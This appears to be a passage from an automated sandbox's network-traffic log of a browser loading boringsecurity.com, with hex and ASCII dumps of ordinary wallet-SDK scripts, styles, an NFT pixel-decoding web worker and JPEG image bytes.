                                                                          2023-12-10 16:44:51 UTC4744INData Raw: 63 68 28 74 29 7b 63 61 73 65 22 73 74 61 6e 64 61 72 64 22 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 60 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 20 77 69 64 74 68 3d 27 24 7b 65 7d 27 20 68 65 69 67 68 74 3d 27 24 7b 65 7d 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 31 30 32 34 20 31 30 32 34 27 20 66 69 6c 6c 3d 27 6e 6f 6e 65 27 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 25 33 45 20 25 33 43 72 65 63 74 20 77 69 64 74 68 3d 27 31 30 32 34 27 20 68 65 69 67 68 74 3d 27 31 30 32 34 27 20 66 69 6c 6c 3d 27 25 32 33 30 30 35 32 46 46 27 2f 25 33 45 20 25 33 43 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 27 65 76 65 6e 6f 64 64 27 20 63 6c 69 70 2d 72 75 6c
                                                                          Data Ascii: ch(t){case"standard":default:return`data:image/svg+xml,%3Csvg width='${e}' height='${e}' viewBox='0 0 1024 1024' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Crect width='1024' height='1024' fill='%230052FF'/%3E %3Cpath fill-rule='evenodd' clip-rul
                                                                          2023-12-10 16:44:51 UTC5930INData Raw: 35 36 2c 31 37 2e 35 36 5a 4d 33 36 32 2e 36 36 2c 31 35 2e 37 6c 2d 37 2e 38 38 2c 32 39 68 2d 2e 31 31 6c 2d 38 2e 31 34 2d 32 39 48 33 34 31 6c 2d 38 2c 32 38 2e 39 33 68 2d 2e 31 6c 2d 38 2d 32 38 2e 38 37 48 33 31 39 4c 33 32 39 2e 38 32 2c 35 33 68 35 2e 34 35 6c 38 2e 31 39 2d 32 39 2e 32 34 68 2e 31 31 4c 33 35 32 2c 35 33 68 35 2e 36 36 4c 33 36 38 2e 31 2c 31 35 2e 37 5a 6d 31 33 35 2e 32 35 2c 30 76 34 2e 38 36 68 31 32 2e 33 32 56 35 32 2e 39 32 68 35 2e 36 56 32 30 2e 35 36 68 31 32 2e 33 32 56 31 35 2e 37 5a 4d 34 36 37 2e 38 32 2c 35 32 2e 39 32 68 32 35 2e 35 34 56 34 38 2e 30 36 48 34 37 33 2e 34 33 76 2d 31 32 68 31 38 2e 33 35 56 33 31 2e 33 35 48 34 37 33 2e 34 33 56 32 30 2e 35 36 68 31 39 2e 39 33 56 31 35 2e 37 48 34 36 37 2e 38 32
                                                                          Data Ascii: 56,17.56ZM362.66,15.7l-7.88,29h-.11l-8.14-29H341l-8,28.93h-.1l-8-28.87H319L329.82,53h5.45l8.19-29.24h.11L352,53h5.66L368.1,15.7Zm135.25,0v4.86h12.32V52.92h5.6V20.56h12.32V15.7ZM467.82,52.92h25.54V48.06H473.43v-12h18.35V31.35H473.43V20.56h19.93V15.7H467.82
                                                                          2023-12-10 16:44:51 UTC5443INData Raw: 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 63 6f 6e 74 65 6e 74 2d 71 72 2d 63 6f 6e 6e 65 63 74 69 6e 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 63 6f 6e 74 65 6e 74 2d 71 72 2d 63 6f 6e 6e 65 63 74 69 6e 67 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35
                                                                          Data Ascii: -cbwsdk-connect-content-qr-connecting{position:absolute;top:0;bottom:0;left:0;right:0;display:flex;flex-direction:column;align-items:center;justify-content:center}.-cbwsdk-css-reset .-cbwsdk-connect-content-qr-connecting.light{background-color:rgba(255,25
                                                                          2023-12-10 16:44:51 UTC8302INData Raw: 73 69 6f 6e 49 64 2c 74 2e 73 65 73 73 69 6f 6e 53 65 63 72 65 74 2c 74 2e 6c 69 6e 6b 41 50 49 55 72 6c 2c 74 2e 69 73 50 61 72 65 6e 74 43 6f 6e 6e 65 63 74 69 6f 6e 2c 74 2e 76 65 72 73 69 6f 6e 2c 74 2e 63 68 61 69 6e 49 64 29 2c 66 3d 76 5b 72 5d 3b 69 66 28 21 72 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 64 3d 66 2e 73 74 65 70 73 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 68 29 28 22 64 69 76 22 2c 7b 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 63 6f 6e 6e 65 63 74 2d 63 6f 6e 74 65 6e 74 22 2c 63 6c 61 73 73 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 22 2d 63 62 77 73 64 6b 2d 63 6f 6e 6e 65 63 74 2d 63 6f 6e 74 65 6e 74 22 2c 65 29 7d 2c 28 30 2c 6f 2e 68 29 28 22 73 74 79 6c 65 22 2c 6e 75 6c 6c 2c 6d 2e 64 65 66 61 75 6c 74 29 2c 28 30 2c
                                                                          Data Ascii: sionId,t.sessionSecret,t.linkAPIUrl,t.isParentConnection,t.version,t.chainId),f=v[r];if(!r)return null;let d=f.steps;return(0,o.h)("div",{"data-testid":"connect-content",class:(0,i.default)("-cbwsdk-connect-content",e)},(0,o.h)("style",null,m.default),(0,
                                                                          2023-12-10 16:44:51 UTC3978INData Raw: 6f 6d 3a 38 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 73 6e 61 63 6b 62 61 72 2d 69 6e 73 74 61 6e 63 65 2d 6d 65 6e 75 2d 69 74 65 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 37 66 38 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 36 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 32 35 73 7d 2e 2d 63 62 77 73 64 6b 2d 63 73 73 2d 72 65 73 65 74 20 2e 2d 63 62 77 73 64 6b 2d 73 6e 61 63 6b 62 61 72 2d 69 6e 73 74 61 6e 63 65 2d 6d 65 6e 75 2d 69 74 65 6d 3a 68 6f 76 65 72 20 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 30 35 30 66 31 39 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 32 35 73 7d 2e 2d 63 62 77 73 64 6b
                                                                          Data Ascii: om:8px !important}.-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item:hover{background:#f5f7f8;border-radius:6px;transition:background .25s}.-cbwsdk-css-reset .-cbwsdk-snackbar-instance-menu-item:hover span{color:#050f19;transition:color .25s}.-cbwsdk
                                                                          2023-12-10 16:44:51 UTC10674INData Raw: 75 4e 44 49 33 4c 6a 63 30 4d 69 30 7a 4c 6a 4d 78 4d 69 34 33 4e 44 49 74 4e 79 34 77 4d 6a 4d 75 4e 7a 51 79 61 43 30 33 4c 6a 6b 7a 4f 47 4d 74 4d 79 34 33 4d 54 45 67 4d 43 30 31 4c 6a 55 35 4e 69 41 77 4c 54 63 75 4d 44 49 7a 4c 53 34 33 4e 44 4a 68 4e 69 34 31 4d 7a 45 67 4e 69 34 31 4d 7a 45 67 4d 43 41 77 49 44 45 74 4d 69 34 35 4d 54 4d 74 4d 69 34 35 4d 54 4e 44 4d 43 41 79 4e 43 34 79 4d 54 49 67 4d 43 41 79 4d 69 34 7a 4f 44 51 67 4d 43 41 78 4f 43 34 32 4d 54 5a 32 4c 54 63 75 4f 54 4d 34 57 69 49 67 5a 6d 6c 73 62 44 30 69 49 7a 41 77 4e 54 4a 47 52 69 49 76 50 6a 78 77 59 58 52 6f 49 47 51 39 49 6b 30 78 4e 43 34 32 4f 44 51 67 4d 54 6b 75 4e 7a 63 7a 59 79 30 79 4c 6a 63 79 4e 79 41 77 4c 54 51 75 4f 44 59 30 4c 54 49 75 4d 6a 6b 31 4c 54
                                                                          Data Ascii: uNDI3Ljc0Mi0zLjMxMi43NDItNy4wMjMuNzQyaC03LjkzOGMtMy43MTEgMC01LjU5NiAwLTcuMDIzLS43NDJhNi41MzEgNi41MzEgMCAwIDEtMi45MTMtMi45MTNDMCAyNC4yMTIgMCAyMi4zODQgMCAxOC42MTZ2LTcuOTM4WiIgZmlsbD0iIzAwNTJGRiIvPjxwYXRoIGQ9Ik0xNC42ODQgMTkuNzczYy0yLjcyNyAwLTQuODY0LTIuMjk1LT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          105192.168.2.54983875.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC564OUTGET /_next/static/chunks/924.bd5f832b6d1a0e30.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:51 UTC420INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 65
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50924Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 142Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:51 GMTEtag: "0e
                                                                          2023-12-10 16:44:51 UTC142INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 32 34 5d 2c 7b 37 39 33 39 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 35 37 30 30 32 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 38 37 39 34 32 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 38 32 38 38 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 5d 29 3b
                                                                          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[924],{79391:function(){},57002:function(){},87942:function(){},82880:function(){}}]);


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          106192.168.2.54983975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC465OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:51 UTC422INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 32 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 4284Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:51 GMTEtag: "
                                                                          2023-12-10 16:44:51 UTC764INData Raw: 63 6f 6e 73 74 20 64 65 63 6f 64 65 72 20 3d 20 6e 65 77 20 54 65 78 74 44 65 63 6f 64 65 72 28 29 3b 0a 0a 63 6f 6e 73 74 20 6e 75 6d 62 65 72 50 65 72 47 72 6f 75 70 20 3d 20 33 32 3b 0a 63 6f 6e 73 74 20 65 6d 70 74 79 48 65 78 34 20 3d 20 27 30 30 30 30 27 3b 0a 0a 73 65 6c 66 2e 6f 6e 6d 65 73 73 61 67 65 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 76 74 29 20 7b 0a 20 20 76 61 72 20 62 75 66 66 65 72 73 20 3d 20 65 76 74 2e 64 61 74 61 2e 62 75 66 66 65 72 73 3b 0a 0a 20 20 76 61 72 20 63 6f 6c 6f 72 49 6e 64 65 78 50 72 65 70 72 6f 63 65 73 73 65 64 20 3d 20 65 76 74 2e 64 61 74 61 2e 63 6f 6c 6f 72 49 6e 64 65 78 50 72 65 70 72 6f 63 65 73 73 65 64 3b 0a 20 20 76 61 72 20 63 6f 6c 6f 72 49 6e 64 65 78 65 73 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28
                                                                          Data Ascii: const decoder = new TextDecoder();const numberPerGroup = 32;const emptyHex4 = '0000';self.onmessage = function (evt) { var buffers = evt.data.buffers; var colorIndexPreprocessed = evt.data.colorIndexPreprocessed; var colorIndexes = JSON.parse(
                                                                          2023-12-10 16:44:51 UTC2372INData Raw: 75 72 49 6e 64 65 78 3b 0a 20 20 76 61 72 20 69 6e 64 65 78 3b 0a 0a 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 2c 20 6e 20 3d 20 70 69 78 65 6c 47 72 6f 75 70 73 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 2f 2f 20 63 75 72 72 65 6e 74 20 67 72 6f 75 70 20 6f 66 20 33 32 20 70 69 78 65 6c 73 20 28 73 6c 69 63 65 20 74 6f 20 73 68 61 76 65 20 6f 66 66 20 74 68 65 20 27 30 78 27 20 61 74 20 74 68 65 20 73 74 61 72 74 29 0a 20 20 20 20 63 75 72 72 65 6e 74 50 69 78 65 6c 47 72 6f 75 70 20 3d 20 6c 65 66 74 50 61 64 28 70 69 78 65 6c 47 72 6f 75 70 73 5b 69 5d 2e 68 65 78 2c 20 36 34 29 2e 73 6c 69 63 65 28 32 29 3b 0a 20 20 20 20 67 72 6f 75 70 53 70 6c 69 74 49 6e 64 65 78 20 3d 20 30 3b 0a 20 20 20 20 66 6f 72 20
                                                                          Data Ascii: urIndex; var index; for (var i = 0, n = pixelGroups.length; i < n; i++) { // current group of 32 pixels (slice to shave off the '0x' at the start) currentPixelGroup = leftPad(pixelGroups[i].hex, 64).slice(2); groupSplitIndex = 0; for
                                                                          2023-12-10 16:44:51 UTC538INData Raw: 6f 75 72 29 20 7b 0a 20 20 72 65 74 75 72 6e 20 63 6f 6c 6f 75 72 3b 0a 7d 0a 0a 2f 2a 2a 0a 20 2a 20 40 72 65 74 75 72 6e 20 63 6f 6c 6f 75 72 20 66 75 6e 63 74 69 6f 6e 20 66 6f 72 20 65 6e 64 69 61 6e 20 74 79 70 65 0a 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 67 65 74 43 6f 6c 6f 75 72 46 6f 72 45 6e 64 69 61 6e 54 79 70 65 28 69 73 4c 69 74 74 6c 65 45 6e 64 69 61 6e 29 20 7b 0a 20 20 72 65 74 75 72 6e 20 69 73 4c 69 74 74 6c 65 45 6e 64 69 61 6e 0a 20 20 20 20 3f 20 67 65 74 43 6f 6c 6f 75 72 4c 69 74 74 6c 65 45 6e 64 69 61 6e 46 75 6e 63 74 69 6f 6e 0a 20 20 20 20 3a 20 67 65 74 43 6f 6c 6f 75 72 42 69 67 45 6e 64 69 61 6e 46 75 6e 63 74 69 6f 6e 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 67 65 74 50 69 78 65 6c 50 6f 73 69 74 69 6f 6e 28 67 72 6f 75
                                                                          Data Ascii: our) { return colour;}/** * @return colour function for endian type */function getColourForEndianType(isLittleEndian) { return isLittleEndian ? getColourLittleEndianFunction : getColourBigEndianFunction;}function getPixelPosition(grou
                                                                          2023-12-10 16:44:51 UTC610INData Raw: 20 28 28 28 72 67 62 35 36 35 49 6e 74 20 3e 3e 20 35 29 20 26 20 30 78 33 66 29 20 2a 20 32 35 39 20 2b 20 33 33 29 20 3e 3e 20 36 3b 0a 20 20 76 61 72 20 62 20 3d 20 28 28 72 67 62 35 36 35 49 6e 74 20 26 20 30 78 31 66 29 20 2a 20 35 32 37 20 2b 20 32 33 29 20 3e 3e 20 36 3b 0a 0a 20 20 76 61 72 20 52 47 42 38 38 38 20 3d 20 28 72 20 3c 3c 20 31 36 29 20 7c 20 28 67 20 3c 3c 20 38 29 20 7c 20 62 3b 0a 20 20 76 61 72 20 52 47 42 20 3d 20 68 65 78 54 6f 42 79 74 65 73 36 28 52 47 42 38 38 38 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 3b 0a 20 20 76 61 72 20 52 47 42 41 48 65 78 20 3d 20 27 30 78 27 2e 63 6f 6e 63 61 74 28 52 47 42 29 2e 63 6f 6e 63 61 74 28 27 46 46 27 29 3b 0a 0a 20 20 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 52 47 42 41 48 65 78
                                                                          Data Ascii: (((rgb565Int >> 5) & 0x3f) * 259 + 33) >> 6; var b = ((rgb565Int & 0x1f) * 527 + 23) >> 6; var RGB888 = (r << 16) | (g << 8) | b; var RGB = hexToBytes6(RGB888.toString(16)); var RGBAHex = '0x'.concat(RGB).concat('FF'); return parseInt(RGBAHex


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          107192.168.2.54984675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC661OUTGET /_ipx/w_2048,q_75/%2Fimages%2Fbanner.jpeg?url=%2Fimages%2Fbanner.jpeg&w=2048&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC421INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 33 38 62 65 39 2d 66 35 34 72 4d 66 5a 32 51 65 39 35 31 30 6a 4f 72 33 77 34
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 1Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:44:52 GMTEtag: "38be9-f54rMfZ2Qe9510jOr3w4
                                                                          2023-12-10 16:44:52 UTC765INData Raw: 36 63 36 62 0d 0a ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 03 5b 07 ff 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f1 a4 96 7a 26 a4 10 b2 b0 18 04 9a c4 9b 2b 72 72 c1 b6 41
                                                                          Data Ascii: 6c6bC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222["z&+rrA
                                                                          2023-12-10 16:44:52 UTC2372INData Raw: 0c 21 0b 20 26 30 60 56 c9 25 56 57 71 06 c5 4e 2e c6 d3 95 c6 51 48 c2 ca e9 c6 51 06 a4 21 a0 00 49 82 18 92 6c 54 30 83 4c 01 90 53 82 45 85 09 90 01 40 08 46 48 bd 8f 3b 52 41 2a ad ad 44 c4 18 d4 63 06 39 54 64 10 60 6b 83 8e 77 5a 91 ac a2 4a 22 35 60 a4 a9 42 70 41 a9 90 8c e2 4a 32 00 01 27 10 8c e0 97 4a 32 18 12 80 0c 19 06 d9 4c e3 3b 24 d3 94 00 00 0a ad a8 90 16 46 bb 62 16 58 da a6 bd 75 25 20 00 21 0c 22 31 2c 69 80 00 9a 14 27 10 60 34 c2 bb 6b 98 c6 00 a2 48 ae 49 30 6b 19 37 11 a3 5d 02 8c e1 6a 9c 2c 44 31 50 c1 29 21 35 24 b0 6a 51 81 11 a0 1a 1a 0a 33 e9 cc 8d 82 d7 25 24 18 28 0c 01 89 a6 5a a4 a1 36 50 c7 09 4a 34 da 70 b1 ec c7 57 a6 02 60 26 08 00 60 69 02 5c ee 36 24 46 09 a0 01 8a ab 6a b1 8c 21 65 76 00 c5 18 00 32 23 11 35 22
                                                                          Data Ascii: ! &0`V%VWqN.QHQ!IlT0LSE@FH;RA*Dc9Td`kwZJ"5`BpAJ2'J2L;$FbXu% !"1,i'`4kHI0k7]j,D1P)!5$jQ3%$(Z6PJ4pW`&`i\6$Fj!ev2#5"
                                                                          2023-12-10 16:44:52 UTC538INData Raw: 30 c9 a2 8b 75 21 4f 0e ce 9a e9 67 e5 e5 d3 d1 af 3b a4 ec 26 b1 8c e9 3d e6 8b 70 df b5 f6 f3 e7 2e c5 8d 1a 27 86 76 59 9e 74 a5 d3 c3 ab 53 62 8c b3 55 56 d4 5a 9a a8 34 d3 04 94 b5 a7 38 59 2c f1 6b c8 b7 03 52 4a 52 b6 a5 04 93 9a 63 72 d2 32 c8 a9 45 09 46 64 e5 17 9d 46 32 8d 8a ca ad a8 a7 14 aa c8 4f 52 98 ca 3a c4 30 6e c3 ac 44 06 25 bf 9f ae ea d8 c2 e6 ab 62 1a 60 c1 0c 68 1a 29 02 25 3a 8b 9b a8 94 6c 98 9e 77 18 ce 08 86 90 13 1c a2 d5 a1 0d a0 60 95 a6 90 00 21 28 22 52 88 4a 2d 09 46 4a 30 56 80 60 0c 00 06 20 01 49 16 38 ca 5a ba 5c ce 9e 2d 9e bb c9 7a de 13 91 e3 7d 9f 8c dc 51 94 7a 2f b2 bb 2d 22 e3 43 8b 4d 00 4a d2 29 a0 08 4a 24 71 ec c6 cc 2c ae c8 e9 77 38 7d de 5a 1d da 79 eb 2a df 9e 5b e4 a5 8a 66 bf 39 ad c5 c3 cd a7 29 d6
                                                                          Data Ascii: 0u!Og;&=p.'vYtSbUVZ48Y,kRJRcr2EFdF2OR:0nD%b`h)%:lw`!("RJ-FJ0V` I8Z\-z}Qz/-"CMJ)J$q,w8}Zy*[f9)
                                                                          2023-12-10 16:44:52 UTC4744INData Raw: 97 55 ae ca 9b 4d a5 53 11 2b 69 8e 2d 0c 15 2d 78 fa 88 b1 6a a7 52 ba 37 e7 4a 5e a8 cb 44 2e ac 80 90 c0 89 09 ab 40 00 0c 11 24 20 00 21 38 22 40 0d 03 69 8c 11 21 31 89 83 4d 53 10 c4 c1 30 9c a1 39 6a e9 f3 7a 5c ed 9e b7 c9 7a ee 33 91 e3 7d a7 8b d4 8c 67 1e 8b ac aa 7a ae 2d 52 13 b2 f1 39 58 02 10 0a 49 2a cb ab 2a 42 ca ec 8e bf a8 f3 3e 9f 8e e4 87 cf 52 cd a3 3c 68 94 1e 6b cf 7d 06 96 96 6c b3 69 cd 5b 34 e5 71 bf 35 39 b5 9e c3 c7 75 5d 9b 5b eb 9a 28 ea cf 17 8f 5e dc 5c 76 ad aa dc dc 9e 5f d4 79 0f 47 3c 26 bc 9e ac 4e 13 91 54 ec b8 cc 6c 0b 7d 27 96 97 37 ae d7 c2 ee 78 fb 4d 06 35 8f 66 3d 76 31 4a 5a a1 65 56 68 1a 8d 4a 17 7a f8 72 29 ed 4b a6 78 cf b3 0b 79 bb 1d b9 51 06 b8 74 96 4d 79 79 6f 5a 6a 5f 9e f2 fa 7c cf a3 c2 7d ae 2f
                                                                          Data Ascii: UMS+i--xjR7J^D.@$ !8"@i!1MS09jz\z3}gz-R9XI**B>R<hk}li[4q59u][(^\v_yG<&NTl}'7xM5f=v1JZeVhJzr)KxyQtMyyoZj_|}/
